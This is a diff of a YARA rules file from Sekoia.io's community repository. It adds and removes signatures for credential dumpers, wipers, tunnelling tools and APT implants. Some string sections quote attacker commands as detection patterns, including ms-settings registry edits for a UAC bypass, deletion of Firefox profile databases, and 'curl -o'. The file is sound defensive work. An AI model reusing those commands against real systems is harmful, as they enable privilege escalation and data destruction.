 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sharpsecdump.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f183069d843767daa97bc81385e5e1b3a19c556f8171f28f8806aebe7a226176"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_quarkspwdump.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4799e1d1c749a536d7920e3c333d69f7130376c6a0f0e0ca8f0b61e438266adb"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$s1 = "quarks-pwdump.exe"
+		$s2 = "--------------------------------------------- BEGIN DUMP --------------------------------------------"
+		$s3 = "%s_hist%d:\"\":\"\":%s:%s"
+
+	condition:
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+}
+
+rule SEKOIA_Merlin_Win_Exe : FILE
+{
+	meta:
+		description = "Detects Merling agent (PE)"
+		author = "Sekoia.io"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be4"
+		date = "2022-01-03"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/merlin_win_exe.yar#L4-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6a42e9ea9749dc894788d80cd4395da026ef3c49eab1de6802e09f8b1751f5bd"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$s1 = "B.symtab" ascii
+		$s2 = "github.com/Ne0nd0g/merlin" ascii
+		$s3 = "github.com/lucas-clemente" ascii
+		$s4 = "SendMerlinMessage" ascii
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "07b5472d347d42780469fb2654b7fc54" ) and all of them and $s1 at 591 and filesize < 15MB
+}
+rule SEKOIA_Hacktool_Credentialkatz : FILE
+{
+	meta:
+		description = "Finds ChromeKatz (CredentialKatz version) standalone samples based on the strings"
+		author = "Sekoia.io"
+		id = "4795d131-2625-40ca-bca6-02aac5030b55"
+		date = "2024-10-30"
+		modified = "2024-12-19"
+		reference = "https://github.com/Meckazin/ChromeKatz"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_credentialkatz.yar#L1-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2762e066128e186526c5ff272fc9184c0262d81d8c513e6515c25c189418931c"
+		logic_hash = "dbfc0a6e8ad6701a071cb76564a2aeb9924ff7f13306f5dca1e1045c51f07ae7"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "SharpSecDump"
-		$s2 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7"
-		$s3 = "Md4Hash2"
-		$s4 = "RidToKey"
+		$str01 = "Don't use your cat's name as a password!" ascii
+		$str02 = "[-] Failed to parse command line argument /pid!" ascii
+		$str03 = "[*] Targeting process: %ls on PID: %lu" ascii
+		$str04 = "CredentialStore: NotSet" ascii
+		$str05 = "CredentialStore: AccountStore" ascii
+		$str06 = "CredentialStore: ProfileStore" ascii
+		$str07 = "[*] Number of available credentials: %zu" ascii
+		$str08 = "[+] Found browser process: %d" ascii
+		$str09 = "Failed to read credential struct" wide
+		$str10 = "Error reading right node" wide
+		$str11 = "Failed to read the root node from given address" wide
+		$str12 = "Error reading first node" wide
+		$str13 = "chrome.dll" wide
+		$str14 = "    Domain:" ascii
+		$str15 = "    Password:" ascii
+		$str16 = "Found %ls main process PID: %lu" ascii
+		$str17 = "---------------" ascii
+		$str18 = "CredentialKatz" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Tool_Sharphoundexecutable_Strings : FILE
+
+rule SEKOIA_Wiper_Win_Caddywiper : FILE
 {
 	meta:
-		description = "Detects the SharpHound tool"
+		description = "Detect CaddyWiper"
 		author = "Sekoia.io"
-		id = "2cf8046e-5b4d-4ff7-b4b2-7aaeaf58883b"
-		date = "2022-08-11"
+		id = "869d44ff-79fc-403d-a45d-d33712da5bd0"
+		date = "2022-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sharphoundexecutable_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1b28a2b9dd594f344a1a2a74fd9b30527a66dabb451b21afca40a0e6ec8d3553"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_win_caddywiper.yar#L4-L37"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "01a9910b42f402398bbe84546074256f56b10fe0f8524a9a9723aebe43b26a14"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1_upx = "b66b179eac03afafdc69f62c207819eceecfbf994c9efa464fda0d2ba44fe2d7"
+		hash1 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
+		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
 
 	strings:
-		$ = "BloodHoundLoopResults.zip" wide
-		$ = "[-] Removed PSRemote Collection" wide
-		$ = "Initializing SharpHound at {time} on {date}" wide
-		$ = "[SearchForest] Cross-domain enumeration may result in reduced data quality" wide
-		$ = "SharpHound Enumeration Completed at {Time} on {Date}! Happy Graphing!" wide
-		$ = "Consumer task on thread {id} completed" wide
+		$ = "NETAPI32.dll" ascii
+		$ = "DsRoleGetPrimaryDomainInformation" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint16( 0 ) == 0x5A4D and filesize > 5KB and filesize < 20KB and pe.number_of_sections == 3 and pe.number_of_resources == 0 and all of them or pe.imphash ( ) == "ea8609d4dad999f73ec4b6f8e7b28e55" or pe.imphash ( ) == "bae2d138abe43164fb5e95f313de3d14" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f0d4c11521fc3891965534e6c52e128b" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6be6e878d1e8fed277c5feaf60b57a19" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "11f22fc72c3ca7dd6b874bda37c1fe82" )
 }
-rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
+rule SEKOIA_Hacktool_Stowaway_Strings : FILE
 {
 	meta:
-		description = "Finds BBTok installation DLL file"
+		description = "Detects Stowaway based on strings"
 		author = "Sekoia.io"
-		id = "eebed24b-24ec-4a85-852c-52d0acc9a698"
-		date = "2023-09-26"
+		id = "a952b45a-269b-4075-bf72-16d6d863e97c"
+		date = "2023-11-15"
 		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_win_bbtok_dll1_sep23.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "5353956345206982af9bde55300fc405ba6e40722e8f51e8717c30ad32bc8f91"
-		logic_hash = "1b1e25f7d760d275d2ef01390c215edb1752ad65383c92a21d71d9e65da3c5f8"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_stowaway_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "10d28637e47d43497923a192c9e3a8bb35b480a314c71132866bdf0e49c2c460"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227201,33 +227746,32 @@ rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "C:\\Windows\\System32\\rundll32.exe" wide
-		$str02 = "C:\\ProgramData\\mmd.exe" wide
-		$str03 = "REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d" wide
-		$str04 = "C:\\ProgramData\\mmd.exe \\\\" wide
-		$str05 = "\\file\\Trammy.dll" wide
-		$str06 = "Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f" wide
-		$str07 = "REG DELETE  HKCU\\Software\\Classes\\.pwn /f" wide
-		$str08 = "REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f" wide
-		$str09 = "timeout /t 3 >nul & start /MIN computerdefaults.exe" wide
-		$str10 = "set_StartInfo" ascii
-		$str11 = "set_WindowStyle" ascii
+		$ = "agent.CloseLowConn"
+		$ = "agent.CloseListener"
+		$ = "agent.SimpleNodeInit"
+		$ = "agent.HandleConnToLowerNode"
+		$ = "agent.HandleConnFromLowerNode"
+		$ = "common.NewPassToLowerNodeData"
+		$ = "agent.HandleSimpleNodeConn"
+		$ = "agent.HandleConnToUpperNode"
+		$ = "agent.HandleConnFromUpperNode"
+		$ = "agent.StartSocks"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them and filesize < 50KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
+rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
 {
 	meta:
-		description = "Detects Agent Racoon used by CL-STA-0002"
+		description = "Detects PowerTunnel DLL of CloudAtlas"
 		author = "Sekoia.io"
-		id = "ec89f1db-0ba8-48c8-8c1a-c38c410f3e39"
-		date = "2023-12-05"
+		id = "04981493-de8b-4662-ae81-8866c182f8b2"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_agent_racoon_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4e32606edffab0907e343ab2fef8642c0064d83c2933531619f9dee8957d2fe4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powertunnel.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "aadb2739957d17c7e82e3abf7a178ab7b6e4a598fbbdb1a06d0c0531656d4ef6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227235,30 +227779,27 @@ rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Command failed:" wide
-		$ = "Not uploaded:" wide
-		$ = "Not downloaded:" wide
-		$ = "xn--cc" wide
-		$ = "xn--ac" wide
-		$ = "xn--bc" wide
-		$ = "cmd.exe" wide
-		$ = ".xn--" wide
+		$ = "BeginGetHostEntry"
+		$ = "get_AddressList"
+		$ = "time_stop_delay_seconds"
+		$ = "<connect><result>{0}</result></connect>"
+		$ = "_CorDllMain"
 
 	condition:
 		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Payload : FILE
+rule SEKOIA_Hacktool_Microsocks_Strings : FILE
 {
 	meta:
-		description = "Decryption routine of mustang panda payload"
+		description = "Detects Microsocks"
 		author = "Sekoia.io"
-		id = "ce7ddf20-e13f-4b5f-8fff-4b1387b29568"
-		date = "2022-12-08"
+		id = "20e82008-249b-47a3-885b-7c4b04b31a57"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_payload.yar#L1-L42"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "734d42aed4574de620773f1f2d08c6b1fc206efd1b576f0f3679edcc0b2ce91d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_microsocks_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b76b66fbdd9a7e2ea8adb68781d6b14c18189a8b330a61c2a65e7394ef8024c3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227266,79 +227807,107 @@ rule SEKOIA_Apt_Mustangpanda_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        89 74 24 ??
-        B9 ?? ?? ?? ??
-        8B 44 24 ??
-        3D ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        0F 4C C1
-        E9 ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        31 DB
-        31 ED
-        31 FF
-        E9 ?? ?? ?? ??
-        8B 44 24 ??
-        B9 ?? ?? ?? ??
-        3B 44 24 ??
-        B8 ?? ?? ?? ??
-        0F 42 C1
-        E9 ?? ?? ?? ??
-        88 5C 24 ??
-        89 6C 24 ??
-        89 7C 24 ??
-        B9 ?? ?? ?? ??
-        8B 44 24 ??
-        3D ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        0F 4C C1
-        }
+		$ = "microsocks -1 -i listenip -p port -u user -P password"
+		$ = "user/pass, it is added to a whitelist"
 
 	condition:
-		filesize < 8MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Htran_Strings : FILE
+rule SEKOIA_Apt_Sandworm_Caddywiper_Stacked_Strings : FILE
 {
 	meta:
-		description = "Detects HTran based on strings"
+		description = "Detects stacked strings used in the wiper."
 		author = "Sekoia.io"
-		id = "0184937e-eefa-4c6d-ae00-9b0af80dc7db"
-		date = "2022-09-09"
+		id = "7750c4b6-5781-4b1c-8200-cbce9f18aa56"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_htran_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6a414cec8ad623c735779b9005074f88b07d88b29b23918d98a541a2612a3fa0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_caddywiper_stacked_strings.yar#L1-L74"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e8c94e8611a50080368785d2b341a95d5359d1d814e1d665553324118700ed10"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "2.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>"
-		$ = "-tran <ConnectPort> <TransmitHost> <TransmitPort>"
-		$ = "-listen <ConnectPort> <TransmitPort>"
-		$ = "[-] There is a error...Create a new connection."
-		$ = "[+] Start Transmit (%s:%d <-> %s:%d) ......"
-		$ = "[+] Accept a Client on port %d from %s"
+		$ = { C6 45 ?? 6E
+        C6 45 ?? 65
+        C6 45 ?? 74
+        C6 45 ?? 61
+        C6 45 ?? 70
+        C6 45 ?? 69
+        C6 45 ?? 33
+        C6 45 ?? 32
+        C6 45 ?? 2E
+        C6 45 ?? 64
+        C6 45 ?? 6C
+        C6 45 ?? 6C }
+		$ = {  C6 45 ?? 44
+        C6 45 ?? 65
+        C6 45 ?? 76
+        C6 45 ?? 69
+        C6 45 ?? 63
+        C6 45 ?? 65
+        C6 45 ?? 49
+        C6 45 ?? 6F
+        C6 45 ?? 43
+        C6 45 ?? 6F
+        C6 45 ?? 6E
+        C6 45 ?? 74
+        C6 45 ?? 72
+        C6 45 ?? 6F
+        C6 45 ?? 6C }
+		$ = { C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 2E
+        C6 45 ?? 00
+        C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 50
+        C6 45 ?? 00
+        C6 45 ?? 48
+        C6 45 ?? 00
+        C6 45 ?? 59
+        C6 45 ?? 00
+        C6 45 ?? 53
+        C6 45 ?? 00
+        C6 45 ?? 49
+        C6 45 ?? 00
+        C6 45 ?? 43
+        C6 45 ?? 00
+        C6 45 ?? 41
+        C6 45 ?? 00
+        C6 45 ?? 4C
+        C6 45 ?? 00
+        C6 45 ?? 44
+        C6 45 ?? 00
+        C6 45 ?? 52
+        C6 45 ?? 00
+        C6 45 ?? 49
+        C6 45 ?? 00
+        C6 45 ?? 56
+        C6 45 ?? 00
+        C6 45 ?? 45 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
+rule SEKOIA_Tool_Nping_Strings : FILE
 {
 	meta:
-		description = "Detect the QUIETEXIT malware used by UNC3524"
+		description = "Detects NPing"
 		author = "Sekoia.io"
-		id = "1bfa9baa-40a3-4ad7-83dc-f9340fbed180"
-		date = "2022-05-04"
+		id = "fcfd9539-b224-45b4-9252-0b4d56a40be4"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unc3524_quietexit_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9f8bc7516fdefd94c6bddaf77ea3ac1ba8a3a6380530118c4b28d74b42eaae54"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_nping_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0c7216438e9c974d889e4ccc8cdb99ab18d1dc403820d60914b80ff9bc4528fa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227346,51 +227915,54 @@ rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Child connection from %s:%s" ascii
-		$ = "Failed to run %s" ascii
-		$ = "add %s %s %s" ascii
-		$ = "/usr/bin/xauth -q" ascii
-		$ = "/tmp/dropbear-%" ascii
-		$ = "cron" ascii
-		$ = { DD E5 D5 97 20 53 27 BF F0 A2 BA CD 96 35 9A AD 1C 75 EB 47 }
+		$ = "http://nmap.org/nping"
+		$ = "nping scanme.nmap.org"
+		$ = "Bogus target structure passed to %s"
+		$ = "Packet too short."
+		$ = "read_arp_reply_pcap"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize > 1MB and 5 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them and filesize < 1MB
 }
-
-rule SEKOIA_Rat_Win_Romcom_Payload
+rule SEKOIA_Apt_Kimsuky_Sharptongue_Strings : FILE
 {
 	meta:
-		description = "Detect the RomCom malware"
+		description = "Detects SharpTongue variants."
 		author = "Sekoia.io"
-		id = "c391f84c-f0cb-42d8-a8d8-d59725bf74c2"
-		date = "2022-11-04"
+		id = "56027edb-4e6e-40ec-a1b9-36c52b0dd3ec"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_romcom_payload.yar#L4-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "56f016df8e9165522e18f34bdb7c3044ee8927f53dd6818fa2b3d6424191d8e0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharptongue_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a7a9045485f6e713a8ae1bc87cd1296d64905b18e5d13d6e2b9a95328181af54"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "Post0.Open" ascii wide
+		$s2 = ".php?op=" ascii wide
+		$s3 = "s=s&Mid(c,ix*d+jx+1,1)" ascii wide
+		$s4 = "curl -o " ascii wide
+
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "160ed1cdf6e9321cef19cfed6a63b4b5557dd35e174b821bf8a81c4146fa6536" )
+		$s2 in ( @s1 .. @s1 + 200 ) or $s2 in ( @s4 .. @s4 + 200 ) or $s3 and filesize < 500KB
 }
-rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Strings : FILE
 {
 	meta:
-		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
+		description = "Detects XDealer based on strings"
 		author = "Sekoia.io"
-		id = "e992d574-6a44-4bea-97e2-6d5579ce8d02"
-		date = "2022-03-28"
+		id = "06ef72ca-b4e3-493b-8e01-d34b98259c6d"
+		date = "2024-03-22"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rootkit_win_purplefox_svchost_txt.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a1de949cb2e898ed031f5c796f7152af12dfae5431dfaf269f25ebe72f0ae004"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_implant_xdealer_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "13c0bbc933f68164b0fe1c2768148bb649b1755bed0cfbc6ed90188fab6876d5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227398,65 +227970,66 @@ rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\ProgramData\\dll.dll,luohua" wide
-		$str1 = "C:\\ProgramData\\7z.exe" wide
-		$str2 = "F:\\hidden-master\\x64\\Debug\\QAssist.pdb" ascii
-		$str3 = "F:\\Root\\sources\\MedaiUpdateV8\\Release\\MedaiUpdateV8.pdb" ascii
-		$str4 = "cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255" ascii
-		$str5 = "del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db" ascii
+		$ = "unknow_PC"
+		$ = "rdp-tcp#"
+		$ = "Din_%s_%s_%u_"
+		$ = "nslookup %s %s"
+		$ = "XFByb2dyYW1EYXRhXA=="
 
 	condition:
-		4 of ( $str* ) and filesize > 7000KB and filesize < 9500KB
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 1MB
 }
-
-rule SEKOIA_Rootkit_Lin_Winnti : FILE
+rule SEKOIA_Apt_Darkpink_Kamikakabot_Strings
 {
 	meta:
-		description = "Rootkit used by Winnti"
+		description = "Detects KamiKakaBot strings (.NET sample of Dark Pink)"
 		author = "Sekoia.io"
-		id = "c800038e-7f8a-4f24-bf0b-06aba6a828cb"
-		date = "2024-05-22"
+		id = "0f5a7d72-81c8-4fdd-aefd-136bc6d48aa5"
+		date = "2023-02-22"
 		modified = "2024-12-19"
-		reference = "https://x.com/naumovax/status/1792902386295394629"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rootkit_lin_winnti.yar#L4-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d57f9190d2d0c65dad6378d705328c0e9ef679eb8dad75af77d4bbc4f9d0f8d9"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_darkpink_kamikakabot_strings.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0bc37c96b591d8edb1fd288ef874b3cc31879ce166b8734a3dd0e29644cbea55"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "161344ae61278e09eacb1c76508cda45555eee109e6d6a031716a096ab5c84f3"
-		hash2 = "bb56e088739b281c9f56b4fa3fa4d285e45b32c4f9f06b647d7e8cb916054e1a"
-		hash3 = "777c1fda4008f122ff3aef9e80b5b5720c9f2dbc3d7e708277e2ccad1afd8cc5"
-		hash4 = "9c770b12a2da76c41f921f49a22d7bc6b5a1166875b9dc732bc7c05b6ae39241"
 
 	strings:
-		$ = "[CDATA[%s]]></name><type>%o</type><perm>%o</perm><user>%s:%s</user><size>%llu</size><time>%s</time></LIST>"
-		$ = "HideFile"
-		$ = "DownThread"
-		$ = "PortforwardThread"
-		$ = "HidePidPort"
-		$ = "DownFile"
-		$ = "ReadReConnConf"
-		$ = "DecRemotePort"
-		$ = "DecRemoteIP"
+		$ = "Execute"
+		$ = "f4869"
+		$ = "getIndentifyName"
+		$ = "getMessageAsync"
+		$ = "requestMessageID"
+		$ = "run_command"
+		$ = "sendFile"
+		$ = "sendMessage"
+		$ = "send_brw_data"
+		$ = "updateMessageID"
+		$ = "update_new_token"
+		$ = "update_new_xml"
+		$ = {53 00 74 00 61 00 72 00 74 00 65 00 64 00 20 00 75 00 70 00 20 00 72 00 75 00 6e}
+		$ = {20 00 72 00 65 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
+		$ = {6e 00 65 00 77 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
+		$ = {74 00 6f 00 6b 00 65 00 6e 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 21 00 21 00 21}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 6 of them and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" )
+		6 of them
 }
-rule SEKOIA_Tool_Yasso_Strings : FILE
+rule SEKOIA_Apt_Oilrig_Oilbooster_Strings : FILE
 {
 	meta:
-		description = "Detects Yasso based on strings"
+		description = "Detects OilBooster malware based on strings"
 		author = "Sekoia.io"
-		id = "31ec7510-6770-4fde-b835-e8b12f8f2b30"
-		date = "2023-06-21"
+		id = "001d12bc-1e7e-4a6c-9172-66687d08d827"
+		date = "2023-12-20"
 		modified = "2024-12-19"
